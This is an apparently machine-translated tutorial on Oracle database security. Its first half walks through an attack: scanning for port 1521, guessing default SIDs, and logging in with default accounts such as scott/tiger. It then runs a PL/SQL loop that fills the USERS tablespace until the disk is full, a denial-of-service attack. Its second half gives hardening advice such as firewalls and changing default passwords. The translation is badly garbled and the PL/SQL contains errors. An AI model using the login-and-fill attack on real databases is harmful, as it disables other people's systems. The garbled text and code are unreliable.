- Tianyue people often hear Windows security vulnerabilities, frequent virus attacks, etc., our traditional concept is WINDOWS too unsafe; actually Unix / Linux If it is configured, its danger is far higher than people's imagination Most people attach great importance to the safety of the operating system, but as the most important database application, do you pay attention to it? This article aims to introduce the security of the database level, of course, if the operating system is broken, everything is free. Let me take you to try to attack a machine with Oracle
1. First, determine the IP address attacked in Oracle (no purpose, then go to the whole network to scan, find that the 1521 port is opened, don't say that even the scan is, f..)
2, guess its SID number; seem difficult, in fact installed Oracle, the default value, 80% of people will not be modified, or it is easy to guess, such as: Orcl, ORA, ORA8, ORA9, Oracle, Oracle8, Oracle9, Oracle8i, Oracle817, Oracle92 ...
3, after the connection, guess the username and password; it seems more difficult, in fact, Sys, System and other system users have default passwords, but unfortunately in 9i, finally changed to the user's own definition (but most users Or use the previous password or use 'oracle'), and the user who is forgotten, such as Scott, it will be established when the default is installed.
4, SQLPlus Scott / Tiger @ Ora_SID finally logged in, but this small user is just used to do test learning, what do we do with him?
Type: SQL> Select UserName, Default_Tablespace from User_Users;
Username default_tablespa ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ------------ Scott Uses
SQL> SELECT * from SESSION_PRIVS;
Privilege -------------------------------------- Create Sessionalter Sessionunlimited TableSpaceCreate TableCreate Clustercreate Synonymcreate ViewCreate Sequence SequenceCreate Database LinkCreate ProcedureCreate Triggercreate TypeCrete Operatorcreate Indextype
SQL> SELECT * from user_ts_quotas;
TABLESPACE_NAME BYTES MAX_BYTES BLOCKS MAX_BLOCKS ----------------------------------------------------------- --------------- -------------- ---------- System 524288 0 64 0Users 65536 0 8 0
What does that mean?
It means that our user is data default is built on the UserS table space. It has permissions such as the table, and the disk use of the UserS table space is unlimited. Smart readers should understand that we can write a lot of data here. Until your disk, cause the database that cannot be used ... Let's try first
SQL> CREATE TABLE TEST (a char (30));
This TEST table has only one field A
Write a PL / SQL process
DECLAREv_number varchar2 (30); m_number varchar2 (30): = 999999999999999999999999999999; - m_number value representing the number of rows of data is inserted, can be modified but not more than 30. Beginfor v_number in 1..m_number loopinsert INTO TEST (A) VALUES (M_Number); Commital; End loop; end; /
The above PL / SQL process is represented to the TEST table a column cycle inserted '99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 Calculated with 30 Byte per line, a total of more than 20 million tap, even if he is the array of IBM big sharks, you can't hold it. Of course, you can also add a few columns, reduce the m_number value, speed up.
Here, you will remind everyone that an Oracle default user dbsnmp, almost all typical installations of a slightly higher version will create it, the danger index is higher than Scott, because it is created in the system table space ... f..
After a long time, DBA tried to see your own system, generally said that the success rate is quite high. Below we are beginning to talk about how to make safety protection:
1. Enable firewall. Many units of databases do not have firewall protection, or the firewall is configured to transparent. In fact, the firewall can effectively prevent scanning. If you do NAT, address limit, it is better to ban ICMP, so that others can't see your database in the outside network.
2, increasing the construction of multi-layer structural database applications. Traditional C / S despite many advantages, it is really worrying in security. Many program developers write the usernames and passwords of the database directly in the client program, think it will be safe after compiling, but do you start using the text editor to open this client program? You will find out the username and password. There is no such problem, the front desk is a browser or a simple client, which may affect efficiency but is definitely the first choice in the case of the need to provide services in the entire network.
3. Remove the components in Oracle, such as JServer, Agent, remote management, etc.
4. Modify the password of the default user, self-bucing users to strengthen password management and complexity.
Enter the execution with System users
SQL> SELECT UserName from DBA_USERS;
Username ----------------------------- SysSystemoutLndBsnmptestscottrmantest1
SQL> SELECT * from SESSION_PRIVS;
Privilege ---------------------------------------- Create SessionalTer SessionCreate TableCreate Clustercreate Synynymcreate ViewCreate SequenceCreate Database LinkSelect Any Dictionary
See which users do your system exist, have the password modified, is it complicated enough? Is the corresponding permissions suspicion? 5, make data backup
Specifically, there is not much to say, there are detailed posts in the 9CBS related section Description Oracle backup mechanism.
6, reasonable division file system
* Check your file system with DF -K under UNIX / Linux, different users use different tablespaces, different tablespaces are built in different file systems, do not build applications on the System table space, rollback / redo space management table can not be ignored; SQL> host df -kFilesystem 1K-blocks Used Available Use% Mounted on / dev / hda2 5036316 2100832 2679652 44% // dev / hda3 5036316 4381292 399192 92% / oraclenone 256144 0 256144 0 % / DEV / SHM / DEV / HDA5 2016016 863144 1050460 46% / DATA1 / DEV / HDA7 6166948 558176 5295508 10% / DATA2 / DEV / CDROM 81762 81762 0 100% / mNT / CDROM
SQL> SELECT FILE_NAME, TABLESPACE_NAME FROM DBA_DATA_FIL
File_name ------------------------------------------------- -------------------------------- / Oracle / Product / 9.2.01 / ORADATA / SYSTEM. DBFSYSTEM
/ Oracle/Product/9.2.01/oradata/undotbs.dbfundotbs
/Data1/oradata/data1.dbfdata1
/Data2/oradata/data2.dbfdata2
* Under Windows, use the Explorer to check your partition. Different tablespaces are built on different partitions. Don't put the System tablespace and your application together.
Of course, safety management is like smoke sea, this article is full of bricks to jade ...
